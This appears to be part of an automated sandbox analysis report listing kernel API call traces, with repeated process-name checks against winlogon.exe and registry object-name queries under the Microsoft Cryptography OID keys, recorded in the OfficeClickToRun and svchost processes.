| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
|
For performance reasons, the remaining entries are omitted.
Click to download all entries as text file. |
|||||
Execution Path #153 (length: 671, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 671 |
Processes
»
| Process | Count |
|---|---|
| Process 10 (svchost.exe, PID: 1000) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
